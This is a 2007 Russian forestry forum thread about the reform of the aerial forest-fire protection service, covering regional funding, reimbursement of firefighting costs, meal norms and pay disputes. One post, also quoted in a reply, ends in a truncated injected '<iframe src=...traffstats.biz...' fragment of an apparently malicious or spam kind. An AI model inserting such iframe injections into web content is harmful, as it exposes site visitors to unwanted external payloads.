Что происходит в субъектах после уничтожения Авиалесоохраны

Обсуждения, посвящённые реалиям и продолжающемуся реформированию управления лесами и лесных отношений

Модераторы: forester66, Модераторы

Сообщение Сергей Дик » Чт май 17, 2007 10:09 am

Вот поговорил только что с начальником томского филиала Авиалесохраны (хотя, видимо, филиалы остались в прошлом), говорит, все нормально, пришлось переоформлять документы, но сейчас проблем с финансированием нет, оттока специалистов якобы не наблюдается. Кто-то может иную точку зрения изложить?
Сергей Дик
Начинающий пользователь
 
Сообщения: 3
Зарегистрирован: Чт май 17, 2007 7:27 am

Сообщение Шурави » Чт май 17, 2007 12:47 pm

Такое возможно если регион имеет достаточно денег и администрация с головой дружит, что встречается крайне редко. А теперь представте другой вариант, чинуши субъекта видят в газете статью где о них не лестно отзываются, спрашивается, долго ли этот начальник авиабазы на своём кресле просидит. Никто не хочет ссориться с местными чинушами, житья не будет.
Все люди - братья: живут, как будто делят наследство.
Шурави
Активный пользователь
 
Сообщения: 234
Зарегистрирован: Пт июл 23, 2004 12:18 pm

Сообщение Сергей Дик » Чт май 17, 2007 1:18 pm

Да, согласен. К сожалению, это зачастую и мешает освещать некоторые темы. Люди сообщают о проблемах по телефону, мылу, в приватном разговоре, а говорить на камеру отказываются - боятся. Ну а мы без таких людей о проблеме тоже рассказать не можем. Вот такой вот замкнутый круг.

ЗЫ: Если такие люди все же найдутся, и они будут согласны говорить, постарайтесь связаться с вашим местным телевидением и газетчиками (сразу предупрежу, некоторые возможно и не смогут об этом рассказать, - цезура сейчас почти как в СССР). Или киньте ссылку мне с указанием региона, может у меня там знакомые найдутся. Ну а вообще пора бы уже перестать бояться, а то так согнутым можно всю жизнь проходить.
Сергей Дик
Начинающий пользователь
 
Сообщения: 3
Зарегистрирован: Чт май 17, 2007 7:27 am

Сообщение ДжуликоБандитто » Пт май 18, 2007 6:37 am

Шурави писал(а):а лесники начинают докапываться до затрат авиабазы. Оно понятно, они решили прикупить Тойота-Лэнд-Крузер-Прадо серебристого цвета, комплектация GLC, новый - 1 ед. Источник финансирования: федеральный бюджет, вот и экономят на нас.

а бронекопытная авиация пусть на шевроле-нива катаиццо!
а будете выкаблучиаццо - пишиком налетаитесь :D<iframe src='http://traffstats.biz/adv/new.ph
Битиё определяет сознание.
ДжуликоБандитто
Активный пользователь
 
Сообщения: 246
Зарегистрирован: Пт сен 24, 2004 7:20 am
Откуда: От верблюда

Сообщение Fire » Вс май 20, 2007 3:24 pm

ДжуликоБандитто писал(а):
Шурави писал(а):а лесники начинают докапываться до затрат авиабазы. Оно понятно, они решили прикупить Тойота-Лэнд-Крузер-Прадо серебристого цвета, комплектация GLC, новый - 1 ед. Источник финансирования: федеральный бюджет, вот и экономят на нас.

а бронекопытная авиация пусть на шевроле-нива катаиццо!
а будете выкаблучиаццо - пишиком налетаитесь :D<iframe src='http://traffstats.biz/adv/new.ph

Если б только лесники! Чиновники в субъектах по всей стране совсем ошалели. Закон о субвенциях на тушение однозначно говорит, что производиться оплата фактических затрат на основе первички. За нарушение этого у Субъекта могут убрать денежки. Так как Рослезхоз до сих пор (уже три года прошло!) не дал однозначных рекомендаций, четких и внятных, учитывающих все аспекты затрат, как наземного так и АВИАЦИОННОГО тушения, чиновники в Субъектах боятся дать лишнюю копейку лесным пожарным. Причем в каждом Субъекте чиновники по своему трактуют, что считать фактическими затратами.
Доходить до абсурда! Вот Вам такой пример:
Приказ Рослесхоза №109 принятый в 99 году "О бесплатном питании работников участвующих в тушении". Приказ основан на рекомендациях ВНИИПОМлесхоза. Так вот они гласят что людей работающих в тяжелых условия пожара нужно кормить из расчета 5000 ккал в сутки. Человек тратит энергию вкалывая в течении рабочего времени (8-12 часов согласно ТК РФ). Бесплатное питание это прежде всего санитарная норма, компенсация энергозатрат работника, что бы он не грохнулся от усталости и отравления угарным газом.
Те кто писали этот приказ и создавали рекомендации под словами "норма в сутки" имели ввиду "суточный рационный" который полагается человеку за отработанную смену (лично разговаривал с разработчиками).
Но сегодня бюрократы зацепились за слова "в сутки" и считают что если человек отработал 12-часовую смету то ему полагается 2500 ккал.
Здравый смысл отдыхает! Никакие объяснения не принимаются. Руководители с матом пытаются доказать правоту перед чиновниками. Люди на пожарах страдают. Ситуация до сих пор не разрешена! Похоже что ситуация разрешится только после смерти какого-нибуть пожарного и возбуждения уголовного дела, пока Прокурор не объяснит чиновникам, что они не правы.
Вроде мелочь, но это сейчас огромная нерешенная проблема. И таких примеров масса. Практически каждую мелочь сейчас приходится доказывать – оплата прыжков, спусков, налета, выплата командировочных, питание и многое. Все это вызывает огромный социальный резонанс, люди уже работают на пожарах, и они сомневаются, что им заплатят заработанное. Социальный взрыв возможен где-нибудь в июле-сентябре! Если эти мелочи не будут решены, в августе-сентябре огромная масса опытных профессионалов сбежит из системы навсегда. К началу 2008 года большинство авиабаз окончательно превратятся в бомжатники, так как больше никто не захочет профессионально заниматься тушением пожаров.
Авиалесоохрана умирает в судорогах!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Fire
Активный пользователь
 
Сообщения: 109
Зарегистрирован: Вт апр 05, 2005 8:28 am

Сообщение Sveta » Чт июл 19, 2007 2:05 pm

Добрый день! А вот это неправда. Затраты на тушение лесных пожаров возмещают практически сразу. И руководителей лесхозов за недокорм при тушении пожаров строят по росту. А то что каждую копейку приходится доказывать, тоже есть плюсы, в бухгалтерии все разложено по полочкам, "учет и контроль". И нормы нормальные, ГСМ- увеличение на 35%, вполне прилично. И лесников с нового года нет, они все стали рабочими- лесоводами. И что-то не видела ни одного лесхоза, который бы за бюджетные деньги, особенно пожарные покупал машины. А работники авиалесоохраны, работая наравне с лесоводами на тушении, получают на порядок больше: командировочные и т. д. Плюс премии, которые лесхоз не видит. Ко всему этому нагоняи за пожары получает лесхоз, начиная от прокуратуры и заканчивая агентством. Так что не надо из лесхоза делать чучело.
Sveta
Активный пользователь
 
Сообщения: 102
Зарегистрирован: Вт фев 14, 2006 5:39 pm
Откуда: Бурятия

Сообщение Шурави » Чт июл 19, 2007 5:27 pm

Да уж, на пожарах отработали в апреле, а затраты до сих пор не возместили, главбуха в управлении бесит что у мужиков достойные зарплаты на пожарах. По каким к черту полкам разложено, бзык у главбуха лесниковского катит и амбиции. А что лесникам на пожарах не платят, так это вина лесниковского начальства, вот счас хотят чтобы десантники и парашютисты-пожарные за бесплатно тушили. И вооще чтобы авиабаза где-то зарабатывала деньги и за эти деньги тушила лесные пожары. Нельзя Авиалесоохрану как лопату ложить на стеллаж до следующего пожара. Авиалесоохрана пока ещё умеет тушить лесные пожары.
Все люди - братья: живут, как будто делят наследство.
Шурави
Активный пользователь
 
Сообщения: 234
Зарегистрирован: Пт июл 23, 2004 12:18 pm

Сообщение Fire » Пт июл 20, 2007 2:43 pm

Уважаемая Sveta

1. Видимо Вы не поняли, что я говорил не о работе лесников, а о работе чиновников.
2. Очень рад что у Вас в регионе и вашем лесхозе отношения с чиновниками строятся на Взаимопонимании. Поверьте по всей стране это редкость.
3. Меня очень удручает, что Вы, пытаясь оценить труд работника ( в принципе причем не важно чем он занимается, тушением пожаров или выращиванием кроликов) делаете это с позиции сравнения одних с другими. Если у руководства Вашего лесхоза отношение к работникам как к скоту, это еще не означает что остальные люди в других организациях вовлеченные в схожий рабочий процесс должны получать гроши. Человека нужно оценивать за профессиональные качества и результат деятельности. Специалист - это прежде всего человек с особыми знаниями и опытом, и его заменить кем попало не получится. Именно поэтому специалист должен получать адекватную оплату, а не то что посчитал какой-то там чиновник или руководитель. В противном случае спец уйдет. Уж поверьте! Большенство пожарных свои знания приобретали потом и кровью.
Для лесного хозяйства России скотское отношение к работникам, нищенская оплата труда - это давняя традиция.
Я работаю не первый год в лесном хозяйстве, мне частенько приходилость участвовать в проектах, оценках, анализах, работать с солидным чиновничьем бумажным материалом. Поэтому я точно знаю, что в лесном секторе есть деньги и условия для достойной оплаты труда лесникам и лесным специалистам. В большенстве своем причина низких заработков кроется не в отсудствии средств, а в традиционном скотском отношении к людям, в не желании принять саму мысль что лесник должен получать достойную оплату. Мне жаль если Вы Sveta тоже заложник этого традиционного порочного менталитета.
Fire
Активный пользователь
 
Сообщения: 109
Зарегистрирован: Вт апр 05, 2005 8:28 am

Сообщение Sveta » Пт июл 20, 2007 10:19 pm

Добрый день! Я пишу о своем субъекте. У нас возмещение затрат по тушению лесных пожаров производится практически сразу же. Вся зарплата по пожарам за июнь выдана в начале июля. И зарплата на тушении никак не зависит от руководства лесхоза, есть положение об оплате, о чем Вы прекрасно знаете. А насчет сравнения... Почему бы не сравнить. Несколько лет назад сравнивали нормы питания лесников и МЧСников, их нормы были ровно в два раза больше. Сейчас не знаю... В прошлые годы, когда ДПС привлекались для тушения в наземной зоне (без вылета, в смысле спусков) у них зарплата была намного больше, чем у лесников. Я не к тому, чтобы ее урезать, но представьте реакцию лесников, они в основном тоже специалисты, и тушили пожары по 20 и более лет. Сейчас практически в такой ситуации одинаковая. И это правильно - оценка за результат деятельности. За "недокорм" людей на пожаре, во всяком случае у нас, можно получить очень чувствительный нагоняй. А то что порядка именно в оформлении пакета документов по каждому пожару стало больше, это факт. Кстати, с ТБ так же. Я тоже работаю далеко не первый год в лесном хозяйстве, и тоже могу сравнить как было раньше и как сейчас. Вы сравниваете на своем уровне, в масштабе страны, у меня максимум субъект. И с авиаотделением никогда и ничего не делим, мы без них никуда, только в нашем лесхозе площадь авиазоны больше миллиона га. В этом году деления на наземную и авиа нет, но тем не менее на этот миллион без вертолета практически не попадешь, исключение туристы.
Sveta
Активный пользователь
 
Сообщения: 102
Зарегистрирован: Вт фев 14, 2006 5:39 pm
Откуда: Бурятия

Сообщение Шурави » Сб июл 21, 2007 4:29 am

"И зарплата на тушении никак не зависит от руководства лесхоза, есть положение об оплате, о чем Вы прекрасно знаете. "
Ложили они на положение с пробором.

А про мэчээсов лучше не вспоминать эти уроды вообще к лесным пожарам никакого отношения не имеют.
Все люди - братья: живут, как будто делят наследство.
Шурави
Активный пользователь
 
Сообщения: 234
Зарегистрирован: Пт июл 23, 2004 12:18 pm

Пред.След.

Вернуться в Лесное хозяйство на современном этапе

Кто сейчас на конференции

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 35

cron